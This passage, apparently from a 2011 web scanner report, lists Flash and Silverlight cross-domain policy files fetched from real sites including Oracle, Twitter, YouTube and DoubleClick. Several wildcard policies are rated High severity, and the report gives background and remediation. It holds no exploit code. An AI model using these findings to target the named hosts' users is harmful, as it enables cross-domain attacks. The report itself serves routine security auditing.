   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.122. http://www.oracle.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=309450997205923259,0)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.123. http://www.oracleimg.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.oracleimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracleimg.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=194754870172961622,0)
Date: Tue, 06 Sep 2011 15:54:07 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.124. http://www.sapient.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.125. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 06 Sep 2011 15:34:00 GMT
Expires: Tue, 06 Sep 2011 15:34:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.126. http://www2.znode.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www2.znode.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:09 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-s2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.127. http://1215.ic-live.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1215.ic-live.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:10 GMT
ETag: "1320541-1c8-49eb15936b480"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-16
X-Cache-Lookup: MISS from i2a-coll-16:80
Via: 1.0 i2a-coll-16:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admin5.testandtarget.omniture.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admin5.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 17:05:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=640418F0570BDEEB38606A0E869DD5BA; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

4.129. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:11 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.130. https://docs.google.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 22:44:04 GMT
Date: Mon, 05 Sep 2011 22:44:04 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 66149

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.131. http://search.oracle.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.oracle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
ETag: "2916d-103-4d8251fe"
Content-Type: application/xml
Last-Modified: Thu, 17 Mar 2011 18:25:02 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (G;max-age=0+0;age=0;ecid=118531604508,0)
Date: Tue, 06 Sep 2011 15:54:24 GMT
Content-Length: 259
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
...[SNIP]...

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sophelle.app5.hubspot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sophelle.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111e7"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:27:54 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.133. http://sun.edgeboss.net/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sun.edgeboss.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: sun.edgeboss.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7be11faf85a93e167b2214a018411ba6:1237306055"
Last-Modified: Tue, 17 Mar 2009 16:07:35 GMT
Accept-Ranges: bytes
Content-Length: 384
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:13:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optimizeyourit.com" />
   <allow-access-from domain="optimiseyourit.com" />
   <allow-access-from domain="www.optimizeyourit.com" />
   <allow-access-from domain="www.optimiseyourit.com" />
...[SNIP]...

4.134. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.135. http://www.covergirl.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.covergirl.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 12:19:16 GMT
Accept-Ranges: bytes
ETag: "03a528e8e56cc1:295a5"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:26 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="cgmakeover.appspot.com"/>
<allow-http-request-headers-from domain="
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 23 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ads.pointroll.com/clientaccesspolicy.xml
http://ads1.msn.com/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://intelligence.marykay.com/clientaccesspolicy.xml
http://oimg.m.cnbc.com/clientaccesspolicy.xml
http://oimg.nbcuni.com/clientaccesspolicy.xml
http://omni.csc.com/clientaccesspolicy.xml
http://oracle.112.2o7.net/clientaccesspolicy.xml
http://oracleglobal.112.2o7.net/clientaccesspolicy.xml
http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://speed.pointroll.com/clientaccesspolicy.xml
http://stats.deloitte.com/clientaccesspolicy.xml
http://wingateweb.112.2o7.net/clientaccesspolicy.xml
http://cnbc.com/clientaccesspolicy.xml
http://cvs.shoplocal.com/clientaccesspolicy.xml
http://executivevision.cnbc.com/clientaccesspolicy.xml
http://media.cnbc.com/clientaccesspolicy.xml
http://msnbcmedia.msn.com/clientaccesspolicy.xml
http://www.cnbc.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://ads1.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 348
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 01 May 2012 16:29:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intelligence.marykay.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www425
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.m.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Omniture DC/2.0.0
xserver: www369
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www339
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.8. http://omni.csc.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omni.csc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www366
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracle.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www166
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 14:56:57 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

5.13. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:34:25 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 51825
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Tue, 13 Sep 2011 14:56:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.15. http://speed.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
